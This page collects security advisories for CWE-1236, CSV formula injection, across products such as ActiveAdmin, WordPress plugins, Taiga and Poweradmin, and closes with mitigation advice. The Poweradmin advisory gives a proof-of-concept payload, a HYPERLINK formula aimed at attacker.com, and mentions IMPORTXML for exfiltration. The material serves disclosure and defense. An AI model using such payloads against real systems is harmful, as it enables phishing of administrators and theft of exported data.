CWE-1236
AllowedImproper Neutralization of Formula Elements in a CSV File
Abstraction: Base · Status: Incomplete
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
401 vulnerabilities reference this CWE, most recent first.
GHSA-356J-HG45-X525
Vulnerability from github – Published: 2023-12-15 23:44 – Updated: 2024-01-02 14:10Impact
In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user.
The bug affects the functionality to export data as CSV files, and was caused by a variable holding the collection to be exported being shared across threads and not properly synchronized.
The attacker would need access to the same ActiveAdmin application as the victim, and could exploit the issue by timing their request immediately before when they know someone else will request a CSV (e.g. via phishing) or request CSVs frequently and hope someone else makes a concurrent request.
Patches
Versions 2.12.0 and above fixed the problem by completely removing the shared state.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "activeadmin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.12.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-50448"
],
"database_specific": {
"cwe_ids": [
"CWE-1236",
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2023-12-15T23:44:34Z",
"nvd_published_at": "2023-12-28T23:15:43Z",
"severity": "HIGH"
},
"details": "### Impact\n\nIn ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to be able to access potentially private data that belongs to another user.\n\nThe bug affects the functionality to export data as CSV files, and was caused by a variable holding the collection to be exported being shared across threads and not properly synchronized.\n\nThe attacker would need access to the same ActiveAdmin application as the victim, and could exploit the issue by timing their request immediately before when they know someone else will request a CSV (e.g. via phishing) or request CSVs frequently and hope someone else makes a concurrent request.\n\n### Patches\n\nVersions 2.12.0 and above fixed the problem by completely removing the shared state.",
"id": "GHSA-356j-hg45-x525",
"modified": "2024-01-02T14:10:48Z",
"published": "2023-12-15T23:44:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/activeadmin/activeadmin/security/advisories/GHSA-356j-hg45-x525"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50448"
},
{
"type": "WEB",
"url": "https://github.com/activeadmin/activeadmin/pull/7336"
},
{
"type": "PACKAGE",
"url": "https://github.com/activeadmin/activeadmin"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activeadmin/CVE-2023-50448.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Potential CSV export data leak"
}
GHSA-35HG-HJ3J-7WHC
Vulnerability from github – Published: 2022-11-29 21:30 – Updated: 2026-04-08 21:31The Appointment Hour Booking Plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.3.72. This makes it possible for unauthenticated attackers to embed untrusted input into content during booking creation that may be exported as a CSV file when a site's administrator exports booking details. This can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.
{
"affected": [],
"aliases": [
"CVE-2022-4034"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-29T21:15:00Z",
"severity": "HIGH"
},
"details": "The Appointment Hour Booking Plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.3.72. This makes it possible for unauthenticated attackers to embed untrusted input into content during booking creation that may be exported as a CSV file when a site\u0027s administrator exports booking details. This can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.",
"id": "GHSA-35hg-hj3j-7whc",
"modified": "2026-04-08T21:31:45Z",
"published": "2022-11-29T21:30:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4034"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=2803896%40appointment-hour-booking\u0026new=2803896%40appointment-hour-booking\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b3a77b7a-65ad-4334-99c9-92cc79e60bee?source=cve"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/vulnerability-advisories-continued/#CVE-2022-4034"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-382Q-3QJ5-29MX
Vulnerability from github – Published: 2022-05-24 17:46 – Updated: 2022-05-24 17:46Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
{
"affected": [],
"aliases": [
"CVE-2021-1474"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-04-08T04:15:00Z",
"severity": "HIGH"
},
"details": "Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
"id": "GHSA-382q-3qj5-29mx",
"modified": "2022-05-24T17:46:53Z",
"published": "2022-05-24T17:46:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-1474"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-umbrella-inject-gbZGHP5T"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-39MQ-9CJH-6382
Vulnerability from github – Published: 2022-05-24 19:19 – Updated: 2022-05-24 19:19The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when it is opened with a spreadsheet application.
{
"affected": [],
"aliases": [
"CVE-2021-38424"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-03T20:15:00Z",
"severity": "HIGH"
},
"details": "The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when it is opened with a spreadsheet application.",
"id": "GHSA-39mq-9cjh-6382",
"modified": "2022-05-24T19:19:31Z",
"published": "2022-05-24T19:19:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38424"
},
{
"type": "WEB",
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-294-02"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-3C74-P5QR-HHHX
Vulnerability from github – Published: 2025-10-11 09:30 – Updated: 2025-10-11 09:30The Contest Gallery – Upload, Vote & Sell with PayPal and Stripe plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 27.0.3 via gallery submissions. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.
{
"affected": [],
"aliases": [
"CVE-2025-11254"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-11T09:15:32Z",
"severity": "MODERATE"
},
"details": "The Contest Gallery \u2013 Upload, Vote \u0026 Sell with PayPal and Stripe plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 27.0.3 via gallery submissions. This makes it possible for unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.",
"id": "GHSA-3c74-p5qr-hhhx",
"modified": "2025-10-11T09:30:23Z",
"published": "2025-10-11T09:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11254"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3375891/contest-gallery/tags/28.0.0/functions/backend/render/cg-backend-gallery-general.php?old=3372123\u0026old_path=contest-gallery%2Ftags%2F27.0.3%2Ffunctions%2Fbackend%2Frender%2Fcg-backend-gallery-general.php"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?old_path=/contest-gallery/tags/27.0.3\u0026new_path=/contest-gallery/tags/28.0.0\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a0dc62c-786d-40f3-b9c9-bd199a176192?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-3F8F-56CP-M994
Vulnerability from github – Published: 2024-11-26 18:38 – Updated: 2024-11-26 21:32A CSV injection vulnerability in Taiga v6.8.1 allows attackers to execute arbitrary code via uploading a crafted CSV file.
{
"affected": [],
"aliases": [
"CVE-2024-53555"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-26T17:15:26Z",
"severity": "HIGH"
},
"details": "A CSV injection vulnerability in Taiga v6.8.1 allows attackers to execute arbitrary code via uploading a crafted CSV file.",
"id": "GHSA-3f8f-56cp-m994",
"modified": "2024-11-26T21:32:24Z",
"published": "2024-11-26T18:38:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53555"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/1M4UjoTUqlPWLYjevCuE3WhdUqQkRj0-r/view?usp=drive_link"
},
{
"type": "WEB",
"url": "https://gist.githubusercontent.com/Tommywarren/bb1287d17ac83f2e277c0dea798f6ff7/raw/e21132dbaf81e210c2e1cb5babfc4dcca9b2c0d8/CVE-2024-53555"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3FFV-92C7-QQ64
Vulnerability from github – Published: 2022-09-30 00:00 – Updated: 2022-10-04 00:00ZKTeco Xiamen Information Technology ZKBio Time 8.0.7 Build: 20220721.14829 was discovered to contain a CSV injection vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload injected into the Content text field of the Add New Message module.
{
"affected": [],
"aliases": [
"CVE-2022-40472"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-09-29T20:15:00Z",
"severity": "HIGH"
},
"details": "ZKTeco Xiamen Information Technology ZKBio Time 8.0.7 Build: 20220721.14829 was discovered to contain a CSV injection vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload injected into the Content text field of the Add New Message module.",
"id": "GHSA-3ffv-92c7-qq64",
"modified": "2022-10-04T00:00:19Z",
"published": "2022-09-30T00:00:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40472"
},
{
"type": "WEB",
"url": "https://the-it-wonders.blogspot.com/2022/09/zkbio-time-csv-injection.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3G3F-PFF6-G3M3
Vulnerability from github – Published: 2023-11-28 12:31 – Updated: 2023-11-28 12:31IBM Security Guardium 11.3, 11.4, and 11.5 is potentially vulnerable to CSV injection. A remote attacker could execute malicious commands due to improper validation of csv file contents. IBM X-Force ID: 265262.
{
"affected": [],
"aliases": [
"CVE-2023-42004"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-28T11:15:07Z",
"severity": "HIGH"
},
"details": "IBM Security Guardium 11.3, 11.4, and 11.5 is potentially vulnerable to CSV injection. A remote attacker could execute malicious commands due to improper validation of csv file contents. IBM X-Force ID: 265262.",
"id": "GHSA-3g3f-pff6-g3m3",
"modified": "2023-11-28T12:31:25Z",
"published": "2023-11-28T12:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42004"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/265262"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7069241"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3H6H-67X3-CV5X
Vulnerability from github – Published: 2026-06-08 23:04 – Updated: 2026-06-08 23:04Description:
Summary
Poweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled data — specifically the username field — is written to exported CSV files without sanitizing formula trigger characters (=, +, -, @). When an administrator exports activity logs and opens the resulting CSV in a spreadsheet application (Microsoft Excel, LibreOffice Calc, Google Sheets), any formula stored in a username is executed by the application. This can be used for phishing attacks against administrators or data exfiltration.
Details
The vulnerability exists in all four log export controllers:
lib/Application/Controller/ListLogUsersController.php(lines 188, 194)lib/Application/Controller/ListLogZonesController.phplib/Application/Controller/ListLogGroupsController.phplib/Application/Controller/ListLogApiController.php
These controllers export database rows via fputcsv() without applying any formula injection countermeasures. The user column contains the username of the actor who performed the operation, and the username column (in user logs) contains the username of the affected account. Both fields are written verbatim to the CSV output.
A username such as =1+1 is written without CSV enclosure quotes (because it contains no commas or quotes), so spreadsheet applications treat it directly as a formula. A username containing commas or quotes (e.g. =HYPERLINK("http://attacker.com","Click here")) is enclosed in CSV quotes with internal quotes doubled, but spreadsheet applications still evaluate the cell value as a formula since it begins with =.
Additionally, PHP deprecation warnings are emitted directly into the HTTP response body before CSV headers, exposing internal file paths (e.g. /app/lib/Application/Controller/ListLogUsersController.php) — a secondary information disclosure issue (CWE-209). This also corrupts the CSV file when PHP error reporting is enabled.
PoC
Prerequisites: An account with user_add_new permission (administrator role).
Steps to reproduce:
- Log in as administrator.
- Navigate to Add User and create an account with:
- Username:
=HYPERLINK("http://attacker.com","Confirm Identity") - Any valid email and password
- Log out, then log in with the newly created account to generate a log entry.
- Log back in as administrator.
- Navigate to
/users/logsand click Export CSV. - Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.
Result: Excel renders a clickable hyperlink labeled "Confirm Identity" pointing to http://attacker.com in the user column of the log entry. With the simpler username =1+1, the cell displays 2 instead of the literal text, confirming formula execution.
Confirmed on Poweradmin v4.4.0 (Docker image poweradmin/poweradmin:latest).
Impact
This is a CSV Injection vulnerability (CWE-1236). It affects any administrator who exports activity logs to CSV and opens the file in a spreadsheet application.
Attack scenarios:
- Phishing: A malicious actor with the ability to create user accounts sets a formula username that renders as a convincing link in the exported report, tricking a higher-privileged administrator into clicking it.
- Data exfiltration: Using
=IMPORTXML()in Google Sheets or similar, adjacent cell data (log contents) can be sent to an attacker-controlled server silently when the sheet is opened.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "poweradmin/poweradmin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.2.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "poweradmin/poweradmin"
},
"ranges": [
{
"events": [
{
"introduced": "4.3.0"
},
{
"fixed": "4.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47693"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-08T23:04:25Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "Description:\n\n### Summary\n\nPoweradmin v4.4.0 is vulnerable to CSV Injection (Formula Injection) in its log export functionality. User-controlled data \u2014 specifically the username field \u2014 is written to exported CSV files without sanitizing formula trigger characters (=, +, -, @). When an administrator exports activity logs and opens the resulting CSV in a spreadsheet application (Microsoft Excel, LibreOffice Calc, Google Sheets), any formula stored in a username is executed by the application. This can be used for phishing attacks against administrators or data exfiltration.\n\n### Details\n\nThe vulnerability exists in all four log export controllers:\n\n- `lib/Application/Controller/ListLogUsersController.php` (lines 188, 194)\n- `lib/Application/Controller/ListLogZonesController.php`\n- `lib/Application/Controller/ListLogGroupsController.php`\n- `lib/Application/Controller/ListLogApiController.php`\n\nThese controllers export database rows via `fputcsv()` without applying any formula injection countermeasures. The `user` column contains the username of the actor who performed the operation, and the `username` column (in user logs) contains the username of the affected account. Both fields are written verbatim to the CSV output.\n\nA username such as `=1+1` is written **without CSV enclosure quotes** (because it contains no commas or quotes), so spreadsheet applications treat it directly as a formula. A username containing commas or quotes (e.g. `=HYPERLINK(\"http://attacker.com\",\"Click here\")`) is enclosed in CSV quotes with internal quotes doubled, but spreadsheet applications still evaluate the cell value as a formula since it begins with `=`.\n\nAdditionally, PHP deprecation warnings are emitted directly into the HTTP response body before CSV headers, exposing internal file paths (e.g. `/app/lib/Application/Controller/ListLogUsersController.php`) \u2014 a secondary information disclosure issue (CWE-209). This also corrupts the CSV file when PHP error reporting is enabled.\n\n### PoC\n\n**Prerequisites:** An account with `user_add_new` permission (administrator role).\n\n**Steps to reproduce:**\n\n1. Log in as administrator.\n2. Navigate to Add User and create an account with:\n - Username: `=HYPERLINK(\"http://attacker.com\",\"Confirm Identity\")`\n - Any valid email and password\n3. Log out, then log in with the newly created account to generate a log entry.\n4. Log back in as administrator.\n5. Navigate to `/users/logs` and click Export CSV.\n6. Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.\n\n**Result:** Excel renders a clickable hyperlink labeled \"Confirm Identity\" pointing to `http://attacker.com` in the `user` column of the log entry. With the simpler username `=1+1`, the cell displays `2` instead of the literal text, confirming formula execution.\n\nConfirmed on Poweradmin v4.4.0 (Docker image `poweradmin/poweradmin:latest`).\n\n### Impact\n\nThis is a CSV Injection vulnerability (CWE-1236). It affects any administrator who exports activity logs to CSV and opens the file in a spreadsheet application.\n\n**Attack scenarios:**\n\n- **Phishing:** A malicious actor with the ability to create user accounts sets a formula username that renders as a convincing link in the exported report, tricking a higher-privileged administrator into clicking it.\n- **Data exfiltration:** Using `=IMPORTXML()` in Google Sheets or similar, adjacent cell data (log contents) can be sent to an attacker-controlled server silently when the sheet is opened.",
"id": "GHSA-3h6h-67x3-cv5x",
"modified": "2026-06-08T23:04:25Z",
"published": "2026-06-08T23:04:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/poweradmin/poweradmin/security/advisories/GHSA-3h6h-67x3-cv5x"
},
{
"type": "PACKAGE",
"url": "https://github.com/poweradmin/poweradmin"
},
{
"type": "WEB",
"url": "https://github.com/poweradmin/poweradmin/releases/tag/v4.2.4"
},
{
"type": "WEB",
"url": "https://github.com/poweradmin/poweradmin/releases/tag/v4.3.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Poweradmin: CSV Injection in log export endpoints allows formula execution in spreadsheet applications"
}
GHSA-3PQC-WF77-H389
Vulnerability from github – Published: 2026-01-27 18:32 – Updated: 2026-01-27 18:32Dirsearch 0.4.1 contains a CSV injection vulnerability when using the --csv-report flag that allows attackers to inject formulas through redirected endpoints. Attackers can craft malicious server redirects with comma-separated paths containing Excel formulas to manipulate the generated CSV report.
{
"affected": [],
"aliases": [
"CVE-2021-47901"
],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-27T16:16:13Z",
"severity": "MODERATE"
},
"details": "Dirsearch 0.4.1 contains a CSV injection vulnerability when using the --csv-report flag that allows attackers to inject formulas through redirected endpoints. Attackers can craft malicious server redirects with comma-separated paths containing Excel formulas to manipulate the generated CSV report.",
"id": "GHSA-3pqc-wf77-h389",
"modified": "2026-01-27T18:32:14Z",
"published": "2026-01-27T18:32:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47901"
},
{
"type": "WEB",
"url": "https://github.com/maurosoria/dirsearch"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/49370"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/dirsearch-csv-injection"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Mitigation
If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Mitigation
Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
No CAPEC attack patterns related to this CWE.